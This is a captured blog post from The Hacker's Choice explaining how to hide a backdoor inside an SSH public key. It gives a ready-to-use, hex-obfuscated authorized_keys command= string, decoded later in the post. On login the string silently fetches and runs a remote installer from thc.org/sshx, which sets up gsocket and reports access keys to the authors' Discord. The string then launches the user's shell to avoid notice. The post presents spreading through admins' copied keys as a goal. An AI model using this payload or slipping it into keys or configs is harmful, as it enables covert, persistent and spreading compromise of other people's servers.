blog.thc.org Open in urlscan Pro
76.76.21.21  Public Scan

Form analysis
0 forms found in the DOM

Text Content

THE HACKER'S CHOICE

Follow




THE HACKER'S CHOICE

Follow



INFECTING SSH PUBLIC KEYS WITH BACKDOORS


root
·May 24, 2023·

3 min read



In this article, you will learn how to add a backdoor to the SSH Public Key. The
backdoor will execute whenever the user logs in. The backdoor hides as an
unreadable long hex-string inside ~/.ssh/authorized_keys or ~/.ssh/id_*.pub.

The source is available from GitHub.


PERMALINKTL;DR

Simply prepend any SSH Public Key with the following backdoor-string - up until,
but not including, the ssh-ed25519 AAAAC3Nzblah...):

Copy
Copy

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....


Root is not needed.


PERMALINKWHAT'S THE PURPOSE

 1. For the lulz.

 2. Re-starts your backdoor after the server reboots (similar to infecting
    crontab or ~/.bashrc).

 3. Spread laterally: Admins are known to copy their SSH Public Keys to new
    servers. Own them.

 4. Cloud deployments often copy the Admin's Public Key to new instances - and
    now they copy your backdoor inside as well.


PERMALINKTHE NITTY-GRITTY

OpenSSH has an unsung feature to execute a command (instead of a Shell) when a
user successfully logs in. This feature (for example) is used by AWS to tell the
customer not to log in as root:

Copy
Copy

no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user \"ubuntu\" rather than the user \"root\".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...


The trick is to use OpenSSH's command= feature and silently start our backdoor
and afterwards execute the user's shell (with PTY) without the user noticing it.


PERMALINKTHE DETAILS

Let's dissect the backdoor-string: The no-user-rc,no-X11-forwarding is a ruse to
throw off any prying eyes. It can be omitted.

The command= string is where the real magic happens. Here is a shorter version
of a simplified backdoor-string:

Copy
Copy

command="`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)"


OpenSSH executes the entire string between the two quotes "...".

The `###---POWERSHELL---`; is a ruse as well. It does nothing.

The next command, eval, executes the commands that are hidden inside the encoded
hex string.

Let's decode the hex string to reveal the actual commands that are being
executed:

Copy
Copy

$ echo 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -ps
echo Hello Backdoor


This simplified backdoor only prints "Hello Backdoor" on log-in and then
terminates the SSH connection.

Our backdoor-string is more complex and decoded here:

Copy
Copy

[[ $(stat -c%Y /bin/sh) != $(stat -c%Y .ssh) ]] && {
    touch -r /bin/sh .ssh
    export KEY=""
    bash -c "$(curl -fsSL thc.org/sshx)" || bash -c "$(wget --no-verbose -O- thc.org/sshx)" || exit 0
} >/dev/null 2>/dev/null &
[[ -n $SSH_ORIGINAL_COMMAND ]] && exec $SSH_ORIGINAL_COMMAND
[[ -z $SHELL ]] && SHELL=/bin/bash
[[ -f /run/motd.dynamic ]] && cat /run/motd.dynamic
[[ -f /etc/motd ]] && cat /etc/motd
exec -a -$(basename $SHELL) $SHELL


Firstly it uses a canary to make sure that the backdoor is only started once and
not on every login: If ~/.ssh and /bin/sh have the same date then assume that
the backdoor is already installed. Otherwise set them to the same date and
execute the backdoor thereafter.

The backdoor in this case is a backdoor-installer script pulled from
thc.org/sshx and executed in memory. It starts as a background process to not
slow down the user's log-in. The installer-script installs gsocket and if
successful reports the access key and system metrics to our discord channel.

Thereafter the backdoor-string checks if the user wanted to execute a command
rather than a shell.

The last four lines are when the user logs in to a shell - the normal case:

 1. Set the SHELL variable if not set already.

 2. Simulate Linux's motd.

 3. Execute the user's shell.

Keep Hacking,


PERMALINKTHE HACKER'S CHOICE

3





Securityhackingssh


WRITTEN BY


ROOT

Follow
 

Share this


MORE ARTICLES


root


KEEP PAVEL DUROV LOCKED UP

Pavel was not arrested because he criticised Macron. He was arrested because he
(allegedly) facilita…


root


HTTPS INTERCEPTION BY A STATE ACTOR IN GERMANY

Some comments regarding the recently discovered Interception of HTTPS/TLS/SSL
traffic by a state act…


root


THE IRAN FIREWALL - A PRELIMINARY REPORT

I got sidetracked for the last 3 days to assess the Great Firewall of Iran
(GFI). TL;DRThe Internet…



©2024 The Hacker's Choice

Archive·Privacy policy·Terms
Write on Hashnode

Powered by Hashnode - Home for tech writers and readers